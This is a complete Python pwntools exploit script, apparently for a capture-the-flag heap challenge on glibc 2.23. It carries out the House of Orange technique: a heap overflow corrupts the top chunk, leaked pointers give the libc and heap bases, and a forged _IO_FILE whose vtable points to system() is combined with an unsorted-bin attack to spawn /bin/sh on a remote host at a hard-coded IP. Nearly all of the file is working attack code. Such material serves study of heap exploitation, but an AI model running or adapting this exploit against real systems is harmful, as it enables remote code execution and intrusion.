# house_of_orange -- exploit for the original challenge binary (glibc 2.23 target)
from pwn import *
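# debug log level dumps every byte sent/received -- handy while tuning the
# leak offsets, noisy otherwise.
context(arch='amd64', os='linux', log_level='debug')
myelf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
# `python exp.py LOCAL` debugs against a local process with the target libc
# preloaded; the default (no argument) is the remote instance, as before.
if args.LOCAL:
    io = process(myelf.path, env={"LD_PRELOAD": libc.path})
else:
    io = remote("182.92.203.154", 28452)


def uu64(data: bytes) -> int:
    """Unpack a leaked little-endian pointer of up to 8 bytes, zero-padding to 8."""
    return u64(data.ljust(8, b'\0'))


def sla(delim, data):
    """Wait for `delim`, then send `data` followed by a newline."""
    return io.sendlineafter(delim, data)


def sa(delim, data):
    """Wait for `delim`, then send `data` with no trailing newline."""
    return io.sendafter(delim, data)


def add(index: int, size: int, data) -> None:
    """Menu option 1: allocate `size` bytes in slot `index` (0-5) and fill with `data`.

    `data` is sent raw (no newline); the exploit relies on this write not being
    bounded by `size` (the binary evidently does not check it).
    """
    sla(">> ", "1")
    sla("on(0 ~ 5):", str(index))
    sla("turbine: ", str(size))
    sa("name: ", data)


def show(index: int) -> None:
    """Menu option 2: print the contents of slot `index`."""
    sla(">> ", "2")
    sla("viewed: ", str(index))


def edit(index: int, data) -> None:
    """Menu option 3: overwrite slot `index` with `data` (sent raw, no newline).

    As with add(), the write is not bounded by the slot's size, which is the
    overflow the whole exploit is built on.
    """
    sla(">> ", "3")
    sla("turbine: ", str(index))
    sa("input: ", data)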
#gdb.attach(io,"")
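# ---------------------------------------------------------------------------
# Stage 1: House of Orange -- obtain a free chunk without ever calling free().
# ---------------------------------------------------------------------------
# Slot 0 is a 130-byte request (0x90 chunk, 0x88 usable) but we send 144 bytes,
# so the last 8 land on the top chunk's size field. 0xf71 keeps PREV_INUSE set
# and makes the old top end exactly on a page boundary (0x90 + 0xf70 = 0x1000),
# which is what sysmalloc's check on the old top requires.
add(0, 130, b"a" * 136 + p64(0xf71))
# Ask for more than the shrunken top can serve: malloc maps a fresh top and
# releases the old one (0xf70 bytes) into the unsorted bin.
add(1, 0x1000, b"xuan")
# Carve a 0x210 chunk out of it. Per the technique, the old top is first sorted
# into a large bin (fd/bk -> main_arena, fd_nextsize/bk_nextsize -> itself) and
# then split, so slot 2 inherits that header and the stale pointers sit right
# behind slot 0's 0x88 data bytes + 8-byte size field.
add(2, 0x200, b"xuan")

# ---------------------------------------------------------------------------
# Stage 2: leaks. show() prints up to a NUL, so pad to the pointer with a marker
# and read the 6 significant bytes after it. recvn() (not recv()) so a short
# TCP read cannot truncate the pointer and silently corrupt the base.
# ---------------------------------------------------------------------------
MARK = b"b" * 8

# Offsets from slot 0's data: 136 size, 144 fd, 152 bk. bk -> main_arena + 88.
edit(0, b"a" * 144 + MARK)
show(0)
io.recvuntil(MARK)
# 0x3c5188 = offset of main_arena+88 in this particular 2.23 build; it is the
# one constant to re-derive if the target libc changes.
libc_addr = uu64(io.recvn(6)) - 0x3c5188
if libc_addr & 0xfff:
    # a libc base is page aligned; anything else means the leak or the offset
    # is wrong, and continuing would just crash the remote.
    log.error("libc leak does not look like a base address: %#x" % libc_addr)
log.success(hex(libc_addr))
libc.address = libc_addr
# Re-plant a header behind slot 0 (the marker write clobbered it).
edit(0, b"a" * 136 + p64(0xf71))

# Offset 160 is fd_nextsize, which should point at the chunk itself, i.e. the
# address of slot 2's chunk header.
edit(0, b"a" * 152 + MARK)
show(0)
io.recvuntil(MARK)
heap_addr = uu64(io.recvn(6))
log.success(hex(heap_addr))
edit(0, b"a" * 136 + p64(0xf71))

# ---------------------------------------------------------------------------
# Stage 3: unsorted-bin attack + fake _IO_FILE (glibc 2.23: no vtable check).
# ---------------------------------------------------------------------------
# The 0xd60-byte remainder of the old top still sits in the unsorted bin at
# heap_addr + 0x210, i.e. 0x290 bytes past slot 0's data. Overwrite its header
# with a fake FILE, laid out as the House of Orange technique prescribes:
#   prev_size        "/bin/sh\0"  -- the FILE* itself becomes system()'s argument
#   size             0x61         -- passes the unsorted-bin size check; its
#                                   smallbin slot overlaps _chain of main_arena+88
#                                   when that is walked as a FILE
#   fd / bk          0 / &_IO_list_all - 0x10 -- the unsorted-bin attack writes
#                                   main_arena+88 over _IO_list_all
#   _IO_write_base   0, _IO_write_ptr 1 -- makes _IO_flush_all_lockp call __overflow
#   ... up to 0xd8 (including _mode) zero-filled
#   vtable (+0xd8)   points at the 8 qwords of system() that follow it, so any
#                    slot the __overflow lookup picks resolves to system()
fake_file = b"/bin/sh\x00" + p64(0x61)
fake_file += p64(0) + p64(libc.symbols['_IO_list_all'] - 0x10)
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xd8, b"\x00")
vtable_addr = heap_addr + 0x210 + 0xd8 + 0x8
fake_file += p64(vtable_addr) + p64(libc.symbols['system']) * 8
edit(0, b"a" * 0x290 + fake_file)

# Trigger: the next malloc walks the unsorted bin, performs the bk write, then
# trips on the corrupted list -> malloc_printerr -> abort -> _IO_flush_all_lockp,
# which follows _IO_list_all into the fake FILE and its vtable.
sla(">> ", "1")
sla("on(0 ~ 5):", str(4))
sla("turbine: ", str(200))
io.interactive()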